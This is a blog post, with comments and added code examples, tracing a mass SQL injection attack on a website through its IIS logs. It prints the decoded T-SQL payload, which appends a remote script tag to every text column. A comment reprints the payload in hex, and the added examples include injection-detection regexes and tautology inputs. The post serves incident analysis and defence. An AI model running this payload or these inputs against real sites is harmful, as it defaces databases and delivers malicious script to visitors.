Website under attack: a full record of tracking down the culprit
Keywords: attack ┊ Source: original

A friend's website was attacked repeatedly over the past month, and he asked me to find out where the problem was. I was puzzled too: I have been handling that server's security all along and I wrote much of the application code myself, so it should not have had a hole, and the server hardening was in place. I changed a few more settings, applied the Windows patches, blocked some of the application's pages, and turned on IIS logging.
A few days later, malicious code had been injected again. I was furious and resolved not to rest until I caught him.
Some analysis: the database must have been modified directly, because no page had been altered to carry the JS, and there was no way he had remote access to the server. So the next step was to go through the IIS logs for those days.
After a while, a search for the single-quote character ' turned up the problem:
2009-08-28 05:50:25 W3********* 202.*.*.* GET /pro_view.asp id=390';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=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%20eXeC(@s);--|7|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'dEcLaRe@svArChAr8000sEt@s'. 80 - 59.39.66.68 Mozilla/4.0 500 0 0
2009-08-28 05:50:26 W3********* 202.*.*.* GET /pro_view.asp id=390';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=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%20eXeC(@s);--|7|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'dEcLaRe@svArChAr8000sEt@s'. 80 - 59.39.66.68 Mozilla/4.0 500 0 0
A textbook SQL injection. Both logged requests ended in HTTP 500: the |7|80040e14|... suffix that IIS appends to the query field when an ASP page errors records the ODBC driver's syntax error, so these two requests failed, but they still expose the attacker's IP (59.39.66.68, the c-ip field) and the full payload.
A quick search online showed how to read it: un-escape the query string (replace %20 with spaces), assign the hex literal to a variable in SQL Server, and print it:
dEcLaRe @s vArChAr(8000)
sEt @s=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
print Lower(@s)

Output (one statement, broken into lines here for readability):
declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0) begin
exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''"><script src=http://%39%36%33%2e%73%73%2e%6c%61></script>''')
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor

Sure enough, there is the injected script tag, so the cause is found. The payload opens a cursor over every user table (a.xtype='u') and every text, ntext, nvarchar and varchar column (syscolumns xtype 35, 99, 231 and 167) and appends the script tag to each value, which is exactly why the JS turned up in the database without any page being altered. The remaining work is to patch the injectable code, which I did not write!
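The search and decoding described above, done in code rather than by hand: the script below, an added example and not code from the post, reads IIS W3C log lines, flags query strings carrying the stacked-query pattern, splits off the ASP error suffix that IIS appends to cs-uri-query, and decodes the 0x... literal to the T-SQL it hides, then pulls out the script host and the column types the payload walks. It assumes the IIS 6 default field order shown in the post's lines. The log lines, the IP addresses and the hex literal are constructed here (the payload text is the one the post decoded, re-encoded because the literal itself is truncated on the page).

```python
# Added example (not code from the post): scan IIS W3C log lines for the
# injection pattern the post found and decode the hex-wrapped T-SQL payload.
import re
from urllib.parse import unquote

# Stacked statements after a closing quote, or a long 0x... literal.
INJECTION_RE = re.compile(
    r"'\s*;\s*(declare|exec|cast|select|update|insert|drop)\b|0x[0-9a-f]{40,}", re.I)
HEX_LITERAL_RE = re.compile(r"0x([0-9a-f]+)", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=([^\s>]+)", re.I)
XTYPE_RE = re.compile(r"b\.xtype\s*=\s*(\d+)", re.I)
# syscolumns.xtype codes of the character column types the payload targets.
XTYPE_NAMES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar"}


def parse_w3c_line(line):
    """Split one IIS 6 W3C log line. Assumed (default) field order:
    date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port
    cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status.
    IIS appends ASP errors to cs-uri-query as |line|errcode|description."""
    parts = line.split()
    if len(parts) < 12 or parts[0].startswith("#"):
        return None
    query, *asp_err = parts[6].split("|", 3)
    return {
        "time": parts[0] + " " + parts[1],
        "method": parts[4],
        "stem": parts[5],
        "query": unquote(query),
        "asp_error": asp_err[1] if len(asp_err) >= 2 else None,
        "client_ip": parts[9],
        "status": parts[11],
    }


def decode_hex_literals(sql):
    """Return the text of every 0x... literal in a T-SQL fragment. SQL Server
    accepts the literal as varbinary and EXEC runs the statements it encodes,
    which lets the payload pass keyword and quote filters untouched."""
    out = []
    for m in HEX_LITERAL_RE.finditer(sql):
        h = m.group(1)
        if len(h) % 2 == 0:
            out.append(bytes.fromhex(h).decode("latin-1"))
    return out


def describe_payload(sql):
    """The two facts that matter from a decoded mass-injection payload:
    the script host it plants and the column types it walks."""
    src = SCRIPT_SRC_RE.search(sql)
    types = [XTYPE_NAMES.get(int(x), x) for x in XTYPE_RE.findall(sql)]
    return {"script_src": unquote(src.group(1)) if src else None,
            "column_types": types}


def find_injections(lines):
    """Flag lines whose query string matches INJECTION_RE and attach the decoded payload."""
    hits = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None or not INJECTION_RE.search(rec["query"]):
            continue
        rec["hex_sql"] = decode_hex_literals(rec["query"])
        rec["payload"] = describe_payload(rec["hex_sql"][0]) if rec["hex_sql"] else None
        hits.append(rec)
    return hits


# Constructed sample data: the payload text is the one the post decoded,
# re-hex-encoded here; IPs are documentation addresses, not the post's.
PAYLOAD_SQL = (
    "declare @t varchar(255),@c varchar(255) declare table_cursor cursor for "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "open table_cursor fetch next from table_cursor into @t,@c "
    "while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']="
    "rtrim(convert(varchar,['+@c+']))+''\"><script src=http://%39%36%33%2e%73%73%2e%6c%61></script>''')"
    "fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor"
)
HEX_PAYLOAD = "0x" + PAYLOAD_SQL.encode("latin-1").hex()
SAMPLE_LOG = [
    "#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status",
    "2009-08-28 05:49:10 W3SVC1 203.0.113.5 GET /pro_view.asp id=390 80 - 198.51.100.7 Mozilla/4.0 200 0 0",
    "2009-08-28 05:50:25 W3SVC1 203.0.113.5 GET /pro_view.asp "
    "id=390';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=" + HEX_PAYLOAD +
    "%20eXeC(@s);--|7|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]"
    "Line_1:_Incorrect_syntax_near_'dEcLaRe@svArChAr8000sEt@s'. "
    "80 - 198.51.100.7 Mozilla/4.0 500 0 0",
]

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_LOG):
        print(hit["time"], hit["client_ip"], hit["status"], hit["asp_error"])
        print(hit["hex_sql"][0])
        print(hit["payload"])
```

Run against a real log, the hits list gives the attacker IPs to block and the decoded script host to search for in the database; the ASP error code tells you which attempts were rejected (80040e14 is the ODBC syntax error seen in the post) and which returned 200 and need closer inspection.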

While tracking this down I also found that mine was not the only site attacked; many other websites had been mass-injected with the same script from this IP. I reserve the right to pursue this through legal channels.

Posted by jack 3069 days 9 hours 30 minutes ago; viewed 3345 times so far.
zhangyufeng: #1, 3067 days 21 hours 5 minutes ago
Encode and decode methods:
<?php
// Convert one nibble (0-15) to its lowercase hex digit.
function SingleDecToHex($dec){
    $dec = $dec % 16;
    if ($dec < 10)
        return (string)$dec;
    $arr = array("a","b","c","d","e","f");
    return $arr[$dec-10];
}

// Convert one hex digit ('0'-'9', 'a'-'f', 'A'-'F') to 0-15.
function SingleHexToDec($hex){
    $v = Ord($hex);
    if (47 < $v && $v < 58)   // '0'..'9'
        return $v - 48;
    if (96 < $v && $v < 103)  // 'a'..'f'
        return $v - 87;
    if (64 < $v && $v < 71)   // 'A'..'F'
        return $v - 55;
    return 0;                 // not a hex digit
}

// Encode a string as the body of a SQL Server hex literal (without the 0x prefix).
function SetToHexString($str){
    if(!$str) return false;
    $tmp = "";
    for ($i = 0; $i < strlen($str); $i++) {
        $ord = Ord($str[$i]);
        $tmp .= SingleDecToHex(($ord - $ord % 16) / 16);
        $tmp .= SingleDecToHex($ord % 16);
    }
    return $tmp;
}

// Decode a hex literal back to the original string. An optional 0x prefix and
// any whitespace or line breaks are stripped first, so a wrapped literal decodes cleanly.
function UnsetFromHexString($str){
    if(!$str) return false;
    $str = preg_replace('/\s+/', '', $str);
    if (strncasecmp($str, '0x', 2) === 0)
        $str = substr($str, 2);
    $tmp = "";
    for ($i = 0; $i + 1 < strlen($str); $i += 2) {
        $tmp .= chr(SingleHexToDec($str[$i]) * 16 + SingleHexToDec($str[$i+1]));
    }
    return $tmp;
}

$sql = <<<SQL
0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d65
2066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335
206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320574849
4c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29
292b2727223e3c736372697074207372633d687474703a2f2f2533392533362533332532452537332537332532452536432536313e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f
7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72
SQL;
echo UnsetFromHexString($sql);
?>
Why can MySQL still execute it after it has been hex-encoded? Can MySQL still execute it after binary encoding?
jack: #2, 3067 days 19 hours 6 minutes ago
[quote=zhangyufeng]Encode and decode methods:<?phpfunction SingleDecToHex($...[/quote]
I am out of date; I have not followed hacking techniques for a long time and am a bit behind.
Thanks for sharing!
artskin: #3, 3067 days 15 hours 14 minutes ago
I don't understand it, but the page layout is badly broken!
jack: #4, 3067 days 13 hours 5 minutes ago
[quote=artskin]I don't understand it, but the page layout is badly broken![/quote] Heh, nobody to work on the UI...
Anonymous user: #5, 3060 days 12 hours 58 minutes ago
Just check whether the parameter is numeric and you are done.
SQL injection is a very old technique.
jack: #6, 3060 days 10 hours 27 minutes ago
[quote=音速开发者社区网友]Just check whether the parameter is numeric and you are done. SQL injection is a very old technique.[/quote]
It is not that simple; besides numbers, parameters are also strings.
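An added example, not the site's ASP code, for the point the last two comments argue over: the same lookup written with string concatenation and with a bound parameter, run against an in-memory SQLite database standing in for the post's SQL Server (the table, rows and function names are assumed). A numeric allow-list does close the hole for the id parameter, but a string parameter such as a product name cannot be checked that way, and only binding the value keeps a crafted string from changing the query.

```python
# Added example (not the post's code): vulnerable concatenation beside the
# hardened form, for a numeric and for a string parameter. SQLite is used as a
# stand-in for SQL Server; the schema and data are constructed for the demo.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table product(id integer primary key, name text, body text);
        insert into product values (390, 'widget', 'public');
        insert into product values (391, 'gadget', 'internal only');
    """)
    return db


def view_product_concat(db, raw_id):
    # Vulnerable: the raw value becomes part of the SQL text, as in pro_view.asp.
    sql = "select name from product where id=" + raw_id + " order by id"
    return db.execute(sql).fetchall()


def view_product_param(db, raw_id):
    # Hardened: allow-list the shape (comment #5's numeric check), then bind it.
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    return db.execute("select name from product where id=? order by id",
                      (int(raw_id),)).fetchall()


def search_concat(db, raw_name):
    # Vulnerable string parameter: no numeric check applies here (comment #6).
    sql = "select name from product where name='" + raw_name + "' order by id"
    return db.execute(sql).fetchall()


def search_param(db, raw_name):
    # Hardened: the driver sends the value separately; quotes inside it are data.
    return db.execute("select name from product where name=? order by id",
                      (raw_name,)).fetchall()


def param_rejects(db, raw_id):
    """True when the hardened numeric lookup refuses the input."""
    try:
        view_product_param(db, raw_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print(view_product_concat(db, "390 or 1=1"))   # every row leaks
    print(param_rejects(db, "390 or 1=1"))         # rejected before any SQL runs
    print(search_concat(db, "' or ''='"))          # every row leaks
    print(search_param(db, "' or ''='"))           # no row matches that literal name
```

The tautology inputs are the simplest demonstration; the stacked DECLARE/EXEC payload from the post depends on SQL Server running several statements per batch, which SQLite's execute() refuses, so it is not reproduced here.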
